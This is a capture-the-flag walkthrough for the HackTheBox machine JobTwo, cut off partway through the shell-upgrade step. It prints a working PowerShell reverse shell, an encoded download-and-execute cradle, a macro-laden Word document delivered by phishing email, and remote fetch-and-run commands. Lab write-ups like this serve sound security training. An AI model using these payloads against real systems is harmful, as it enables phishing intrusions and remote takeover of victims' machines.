HackTheBox: JobTwo の解説

Executive Summary JobTwo is a Windows Server 2022 machine that simulates a realistic corporate phishing and privilege escalation scenario. The attack chain begins with a job posting website that solicits Word document CVs via email. By crafting a macro-embedded .docm file and sending it to the HR email address, we obtain an initial foothold as user julian . From there, we discover hMailServer installed on the box, extract and crack a password hash from its database to pivot to user ferdinand (user flag). Finally, we exploit CVE-2023-27532 - an unauthenticated credential leak and RCE vulnerability in Veeam Backup & Replication - to execute commands as NT AUTHORITY\SYSTEM and retrieve the root flag. Table of Contents Reconnaissance Web Enumeration Initial Access - VBA Macro Phishing Stable Shell with ConPtyShell Post-Exploitation as Julian Credential Extraction - hMailServer Lateral Movement to Ferdinand (User Flag) Privilege Escalation - CVE-2023-27532 (Veeam) Root Flag Attack Chain Summary Key Vulnerabilities 1. Reconnaissance We start with a full Nmap scan using -A (aggressive mode: OS detection, version detection, script scanning, traceroute) and -Pn (skip host discovery, since ICMP may be blocked): root@kali:/home/kali/htb/Job2# nmap -A -Pn <TARGET_IP> Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-25 07:56 -0400 Nmap scan report for <TARGET_IP> Host is up (0.28s latency). Not shown: 985 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0) 25/tcp open smtp hMailServer smtpd | smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 111/tcp open rpcbind 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/https? | ssl-cert: Subject: commonName=www.job2.vl | Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl | Not valid before: 2023-05-09T13:31:40 |_Not valid after: 2122-05-09T13:41:37 445/tcp open microsoft-ds? 2049/tcp open rpcbind 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: JOB2 | NetBIOS_Domain_Name: JOB2 | NetBIOS_Computer_Name: JOB2 | DNS_Domain_Name: JOB2 | DNS_Computer_Name: JOB2 | Product_Version: 10.0.20348 |_ System_Time: 2026-06-25T12:57:42+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 10001/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier 10002/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier 10003/tcp open storagecraft-image StorageCraft Image Manager Key observations: Port 25 (SMTP) - hMailServer is running, meaning we can send emails directly to the box. Port 80/443 - a web server is present. Port 5985 - WinRM is open, useful for lateral movement if we get credentials. Port 3389 - RDP is open. OS fingerprinting suggests Windows Server 2022 . We add the hostname to /etc/hosts so domain-based virtual hosting resolves correctly: echo '<TARGET_IP> job2.vl www.job2.vl' >> /etc/hosts We then check for anonymous/guest SMB access. Both attempts fail - null sessions and the guest account are disabled: root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u '' -p '' SMB <TARGET_IP> 445 JOB2 [ * ] Windows Server 2022 Build 20348 x64 ( name:JOB2 ) ( domain:JOB2 ) ( signing:False ) ( SMBv1:None ) SMB <TARGET_IP> 445 JOB2 [ -] JOB2 \: STATUS_ACCESS_DENIED root@kali:/home/kali/htb/Job2# nxc smb <TARGET_IP> -u 'guest' -p '' SMB <TARGET_IP> 445 JOB2 [ * ] Windows Server 2022 Build 20348 x64 ( name:JOB2 ) ( domain:JOB2 ) ( signing:False ) ( SMBv1:None ) SMB <TARGET_IP> 445 JOB2 [ -] JOB2 \g uest: STATUS_ACCOUNT_DISABLED SMB is a dead end for now. We pivot to the web server. 2. Web Enumeration Browsing to http://www.job2.vl reveals a boat rental company job posting page. The relevant section reads: "If you are interested in this position, please send your CV to ** [email protected] * as a Microsoft Word Document."* This is the entry point. The site is explicitly asking for a Word document attachment — a classic phishing vector. The target email is [email protected] and SMTP (port 25) is directly accessible, so we can send mail without any authentication bypass needed. 3. Initial Access - VBA Macro Phishing How it works Microsoft Word supports Visual Basic for Applications (VBA) macros embedded inside .docm files. When a victim opens the document and enables macros, the AutoOpen subroutine fires automatically. We abuse this to execute a PowerShell reverse shell payload on the target machine without any user interaction beyond opening the file. Step 1 — Create the PowerShell reverse shell We grab a PowerShell reverse shell from revshells.com - specifically the PowerShell #1 option — plugging in our attacker IP and port 4444, then save it as shell.ps1 . The payload opens a TCP connection back to our machine, reads commands we send, executes them, and returns the output: cat shell.ps1 $LHOST = "<YOUR_IP>" $LPORT = 4444 $TCPClient = New-Object Net.Sockets.TCPClient ( $LHOST , $LPORT ) $NetworkStream = $TCPClient . GetStream () $StreamReader = New-Object IO.StreamReader ( $NetworkStream ) $StreamWriter = New-Object IO.StreamWriter ( $NetworkStream ) $StreamWriter . AutoFlush = $true $Buffer = New-Object System.Byte [] 1024 while ( $TCPClient . Connected ) { while ( $NetworkStream . DataAvailable ) { $RawData = $NetworkStream . Read ( $Buffer , 0 , $Buffer . Length ) $Code = ([ text.encoding ]:: UTF8 ) . GetString ( $Buffer , 0 , $RawData - 1 ) } if ( $TCPClient . Connected -and $Code . Length -gt 1 ) { $Output = try { Invoke-Expression ( $Code ) 2 > & 1 } catch { $_ } $StreamWriter . Write ( " $Output `n " ) $Code = $null } } $TCPClient . Close () $NetworkStream . Close () $StreamReader . Close () $StreamWriter . Close () Step 2 - Base64-encode a download cradle Instead of embedding the full shell script inside the macro (which could trigger AV signatures), we use a download cradle: the macro tells PowerShell to fetch shell.ps1 from our HTTP server and execute it in memory. We encode the cradle in UTF-16LE Base64 (the format PowerShell's -EncodedCommand flag expects): cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://<YOUR_IP>/shell.ps1")' echo -n " $cmd " | iconv -t UTF-16LE | base64 -w0 SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADwAWQBPAFUAUgBfAEkAUAA+AC8AcwBoAGUAbABsAC4AcABzADEAIgApAA == Replace <YOUR_IP> with your own attacker IP and re-run the encoding to get your own base64 string. Step 3 - Create the malicious Word document This step requires a Windows machine with Microsoft Word (Microsoft 365 or an activated license - a trial VM works fine). The VBA project name in the editor will match your .docm filename, so if you save as Doc1.docm , the project will show as Project (evil) in the VBA editor. Open Word → create a new .docm file, save it as evil.docm . Go to View → Macros , type AutoOpen in the macro name box → click Create . In the VBA editor, right-click Project (evil) in the left pane → Insert → Module . Paste the following macro into the module. AutoOpen fires when macros are enabled on open; Document_Open is a fallback for some Word versions: Sub AutoOpen() Shell "powershell -nop -w hidden -ep bypass -e <YOUR_BASE64_HERE>", vbHide End Sub Sub Document_Open() AutoOpen End Sub Save as evil.docm (macro-enabled Word document format). Note: Microsoft 365 or an activated Word license is required to save and embed macros. If unavailable, a Windows VM with a trial/activated copy works fine. Step 4 - Host the payload and set up the listener On our attacker machine, we serve shell.ps1 over HTTP and start a Netcat listener: python3 -m http.server 80 rlwrap -cAr nc -lnvp 4444 ( rlwrap adds readline support for arrow keys and history in the shell.) Step 5 — Send the phishing email We use swaks (Swiss Army Knife for SMTP) to send the malicious document directly to [email protected] via the open SMTP server on port 25. No authentication is required: swaks \ --to [email protected] \ --from [email protected] \ --header 'Subject: Job Application' \ --body "Please review my resume" \ --attach @evil.docm \ --server <TARGET_IP> === Trying <TARGET_IP>:25... === Connected to <TARGET_IP>. <- 220 JOB2 ESMTP -> EHLO kali <- 250-JOB2 <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> MAIL FROM:<[email protected]> <- 250 OK -> RCPT TO:<[email protected]> <- 250 OK -> DATA <- 354 OK, send. [... base64 encoded attachment ...] <** 250 Queued (35.408 seconds) === Connection closed with remote host. Note on timeouts: The connection may show a timeout waiting for server response, but as long as the email is queued ( 250 Queued ), the payload will execute. The server-side mail processor opens the document automatically. Shortly after sending, our HTTP server receives a request for shell.ps1 , and our listener catches the callback: <TARGET_IP> - - [ 26/Jun/2026 06:38:56] "GET /shell.ps1 HTTP/1.1" 200 - rlwrap -cAr nc -lnvp 4444 listening on [any] 4444 ... connect to [<YOUR_IP> ] from ( UNKNOWN ) [ <TARGET_IP>] 57097 hostname JOB2 We have a shell as job2\julian . 4. Stable Shell with ConPtyShell The initial Netcat shell is limited - no tab completion, no arrow keys, and commands like clear can break it. We upgrade to a full interactive PTY shell using ConPtyShell , which uses the Windows ConPTY API to provide a proper terminal experience. Clone the tool and host it: git clone https://github.com/antonioCoco/ConPtyShell.git cd ConPtyShell python3 -m http.server 8000 On the target, download and invoke the script, pointing it at our new listener on port 4445: IEX ( iwr http:// < YOUR_IP > : 8000/Invoke-ConPtyShell.ps1 -UseBasicParsing ) Invoke-ConPtyShell < YOUR_IP > 4445 Start the ConPtyShell listener on our end: stty raw -echo ( stty size ; cat ) | nc -lvnp 4445 liste